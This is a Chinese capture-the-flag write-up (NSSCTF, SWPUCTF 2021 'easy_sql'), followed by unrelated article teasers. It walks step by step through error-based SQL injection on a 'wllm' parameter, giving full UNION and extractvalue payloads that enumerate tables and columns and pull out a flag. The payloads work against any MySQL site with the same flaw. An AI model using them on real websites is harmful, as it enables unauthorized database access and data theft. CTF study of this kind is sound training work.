NSSCTF | [SWPUCTF 2021 新生赛]easy_sql

打开题目,提示输入一些东西,很显眼的可以看到网站标题为“参数是wllm”

首先单引号判断闭合方式

?wllm=1'

报错了,可以判断为单引号闭合。

然后判断字节数(注意‘--’后面的空格

?wllm=1' order by 3--

接着输入4就报错了,由此判断字段数数是3

我们已经知道了字段数,直接爆库名(注意最后的空格)

?wllm=1' union select 1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))),3--

爆出库名是库名是test_db

然后爆表名(注意空格)

/?wllm=1' union select 1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))),3-- 
 

然后我们就可以直接查看test_db中的字段
 

/?wllm=1' union select 1,extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'))),3-- 
 

  
 

已经看到了flag字段,直接查看数据
 

/?wllm=1' and 1=extractvalue(1,concat('~',(select substring(group_concat(id,'~',flag),1,30) from test_tb)))-- 
 

 可以看到一半的flag,
 

因为extractvalue()函数只能返回32个字符,因此我们使用substring()函数解决这个问题:例如substring("abc",1,1),此语句表示从第一个字符读取一个字符返回,在上面的payload中,我们得到的数据中,从第一个字符起读取30个字符返回
 

/?wllm=1' and 1=extractvalue(1,concat('~',(select substring(group_concat(id,'~',flag),31,30) from test_tb)))-- 
 

得到另一半flag
 

 

拼接起来就是完整的flag
 

本题完。

                

        

        

                    

                    

                    

                    

                        

                            本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/608602.html
                        

                        如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!
                    

                    
                    

                        
                    

                

                

                    相关文章

                
                

                    

                        

                            

                                
                                    [Linux][网络][网络层][IP协议]详细讲解
                            

                        

                        

                            

                                [Linux][网络][网络层][IP协议]详细讲解
                            

                            

                                目录 0.基本概念1.IP协议头格式2.IP分片与组装1.为什么要分片?2.分片后谁来组装?3.这个分片操作传输层知道吗?4.如何识别报文和报文的不同?5.接收端,如何得知报文是独立的还是一个分片?6.如何区别哪些分片是…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    UDP和TCP协议比较,TOE技术
                            

                        

                        

                            

                                UDP和TCP协议比较,TOE技术
                            

                            

                                如今在某些方面TCP超越UDP的主要原因如下 在硬件层面的TOE(TCP Offload Engine)功能,将越来越多的TCP功能卸载到网卡上。它极大地提升了TCP的性能,使其在高吞吐量场景下的表现更为出色。近年TCP的拥塞控制算法实现了显著进步。这些新算法显著提高了TCP在…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    macos安装mysql一直卡在安装成功那个页面选项的解决办法
                            

                        

                        

                            

                                macos安装mysql一直卡在安装成功那个页面选项的解决办法
                            

                            

                                问题描述: 
我安装的是比较新的版本8.0.37,安装过程中一直卡在安装那个选项上,且页面提示安装成功了,但就是死活不往下面的配置选项那一步走。 
解决办法: 
1.首先清理掉之前的mysql 
sudo rm -rf /usr/local/mysql2.然…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    软件技术主要学什么课程
                            

                        

                        

                            

                                软件技术主要学什么课程
                            

                            

                                软件技术专业主要学习的课程和内容有编程语言、数据结构与算法、数据库技术等,以下是上大学网( www.sdaxue.com)整理的软件技术主要学什么课程,供大家参考! 编程语言:掌握一种或多种编程语言,如C#、Java、Python、C等&…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    Python 2.x与Python 3.x:初学者该如何选择?
                            

                        

                        

                            

                                Python 2.x与Python 3.x:初学者该如何选择?
                            

                            

                                自从Python在1994年首次发布以来,已经经历了多个版本的更新和改进。Python 1.x虽然在发展史上具有重要意义,但早已过时,不再用于实际开发。2000年发布的Python 2.x和2008年发布的Python 3.x则成为了Python家族中最常用的两个版本,形成了一个重要的分界线。特别是Python 3.x…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    GPU通用计算介绍
                            

                        

                        

                            

                                GPU通用计算介绍
                            

                            

                                谈到 GPU (Graphics Processing Unit,图形显示卡)大多数人想到的是游戏、图形渲染等这些词汇,图形处理确实是 GPU 的一大应用场景。然而人们也早已关注到它在通用计算上的巨大潜力,并提出了 GPGPU (General-purpose co…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    本地搭建hydra服务用go以验证oidc流程
                            

                        

                        

                            

                                本地搭建hydra服务用go以验证oidc流程
                            

                            

                                目录 1、docker搭建hydra,环境配置: 
2、搭建完成后服务调用: 
2.1保证服务正常启动: 
2.2 通过postman调用,获取client_id: 
2.3 通过client_id,实现oauth2/auth调用 
3. 通过go语言实现oidc验…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    jsp 实验12 servlet
                            

                        

                        

                            

                                jsp 实验12 servlet
                            

                            

                                一、实验目的 掌握怎样在JSP中使用javabean  二、实验项目内容&#xff08;实验题目&#xff09; 编写代码&#xff0c;掌握servlet的用法。【参考课本 上机实验1 】  三、源代码以及执行结果截图&#xff1a; 源代碼&#xff1a; inputVertex.jsp&#xff1a; <% page lang…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    免费思维13招之四:主副型思维
                            

                        

                        

                            

                                免费思维13招之四:主副型思维
                            

                            

                                免费思维13招之四:主副型思维 本节,给你分享一下产品型思维的第二种子思维:主副型思维 
什么是主副型思维呢?传统的主副型思维是指对企业的核心、利润最高的产品进行收费,一些附加品、延伸产品进行让利,赠送给客户。 
但是这早已过时了,现在升级之后的产品型思维,就是将…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    ​​​​【收录 Hello 算法】4.4 内存与缓存
                            

                        

                        

                            

                                ​​​​【收录 Hello 算法】4.4 内存与缓存
                            

                            

                                目录 
4.4   内存与缓存  
4.4.1   计算机存储设备 
4.4.2   数据结构的内存效率 
4.4.3   数据结构的缓存效率 4.4   内存与缓存  
在本章的前两节中&#xff0c;我们探讨了数组和链表这两种基础且重要的数据结构&#xff0c;它们分别代表了“连续存储”和“分散存储”两种物理…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    如何防止WordPress网站内容被抓取
                            

                        

                        

                            

                                如何防止WordPress网站内容被抓取
                            

                            

                                最近在检查网站服务器的访问日志的时候&#xff0c;发现了大量来自同一个IP地址的的请求&#xff0c;用站长工具分析确认了我的网站内容确实是被他人的网站抓取了&#xff0c;我第一时间联系了对方网站的服务器提供商投诉了该网站&#xff0c;要求对方停止侵权行为&#xff0c;…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    16【PS Aseprite 作图】图像从Aseprite传输到PS
                            

                        

                        

                            

                                16【PS Aseprite 作图】图像从Aseprite传输到PS
                            

                            

                                【内容背景】Aseprite很适合做像素图&#xff0c;有一个“完美像素”的选项&#xff0c;就不用在PS里面慢慢修线&#xff0c;能够省事很多 
【具体操作】 
勾选完美像素 
Aseprite里面的“完美像素”能够减少修线的步骤&#xff0c;在“作图”的时候一定要注意勾选  
导出 
选择…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    【全开源】Java线上云酒馆单预约系统源码小程序源码
                            

                        

                        

                            

                                【全开源】Java线上云酒馆单预约系统源码小程序源码
                            

                            

                                核心功能&#xff1a; 
座位预约&#xff1a;用户可以通过该系统提前预约酒馆的座位&#xff0c;选择就餐时间和人数&#xff0c;以及特殊座位&#xff08;如包厢、卡座等&#xff09;&#xff0c;确保到店后有合适的座位。酒水点餐&#xff1a;用户可以在预约的同时&#xff0…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    OSError: image file is truncated (36 bytes not processed)解决方案
                            

                        

                        

                            

                                OSError: image file is truncated (36 bytes not processed)解决方案
                            

                            

                                错误原因&#xff1a; 图像文件被损坏 
解决方案&#xff1a; 
代码开头添加如下两行代码&#xff1a; 
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES  True
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    ETL工具kettle(PDI)入门教程,Transform,Mysql->Mysql,Csv->Excel
                            

                        

                        

                            

                                ETL工具kettle(PDI)入门教程,Transform,Mysql->Mysql,Csv->Excel
                            

                            

                                什么是kettle&#xff0c;kettle的下载&#xff0c;安装和配置&#xff1a;ETL免费工具kettle(PDI)&#xff0c;安装和配置-CSDN博客 
mysql安装配置&#xff1a;Linux Centos8 Mysql8.3.0安装_linux安装mysql8.3-CSDN博客 1 mysql -> mysql 
1.1 mysql 
CREATE TABLE user_…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    RS2227XN功能和参数介绍及PDF资料
                            

                        

                        

                            

                                RS2227XN功能和参数介绍及PDF资料
                            

                            

                                RS2227XN是一款模拟开关/多路复用器 品牌: RUNIC(润石) 封装: MSOP-10 描述: USB2.0高速模拟开关 开关电路: 双刀双掷(DPDT) 通道数: 2 工作电压: 1.8V~5.5V 导通电阻(RonVCC): 10Ω 功能&#xff1a;模拟开关/多路复用器 USB2.0高速模拟开关 工作电压范围&#xff1a;1.8V ~ 5…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    【AIGC】重塑未来的科技巨轮
                            

                        

                        

                            

                                【AIGC】重塑未来的科技巨轮
                            

                            

                                AIGC&#xff1a;重塑未来的科技巨轮 一、AIGC&#xff1a;从历史走来&#xff0c;向未来进发二、AIGC的三项核心技术三、AIGC的应用与未来 在当今科技飞速发展的时代&#xff0c;AI&#xff08;人工智能&#xff09;已经成为了一个无法忽视的热词。而与其紧密相连的AIGC&#…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    01-01-4
                            

                        

                        

                            

                                01-01-4
                            

                            

                                1、字符的大小写转换 
对应的代码&#xff1a; 
D:\Book\数据类型与运算符\数据类型与运算符\5、字符的大小写转换 
int main()
{char c  a;//现在是小写字母a&#xff0c;要变为大写字母A。虽然赋值是字符a&#xff0c;但是本质上是将该字符对应的ASCII值放到该变量中c  c - 3…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    QAnything 在mac M2 上纯python环境安装使用体验(避坑指南)
                            

                        

                        

                            

                                QAnything 在mac M2 上纯python环境安装使用体验(避坑指南)
                            

                            

                                这是一篇mac m2本地纯python环境安装 qanything的文章。安装并不顺利&#xff0c;官方提供的模型无法在本地跑。 这篇文章记录了&#xff0c;使用xinference来部署本地模型&#xff0c;并利用openAi的通用接口的方式&#xff0c;可以正常使用。 记录了遇到的所有的问题&#xf…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
                

                    

                        

                            

                                
                                    新手做抖音小店,卖什么最容易出单?抖音必爆类目来了!
                            

                        

                        

                            

                                新手做抖音小店,卖什么最容易出单?抖音必爆类目来了!
                            

                            

                                哈喽&#xff01;我是电商月月 
新手做抖音小店没有经验&#xff0c;也不了解市场需求&#xff0c;最好奇的就是&#xff1a;卖什么商品最容易出单&#xff0c;还在犹豫的朋友可以看看这五种类目&#xff0c;在2024年下半年必定火爆一次 
一&#xff0e;生活电器类 
天气炎热&a…
                            

                            

                                阅读更多...
                            

                        

                    

                

                
            

            

                

                    

                        

                            最新文章

                        
                    

                

            

        

    

    

        

            

                Copyright @ 2022~2023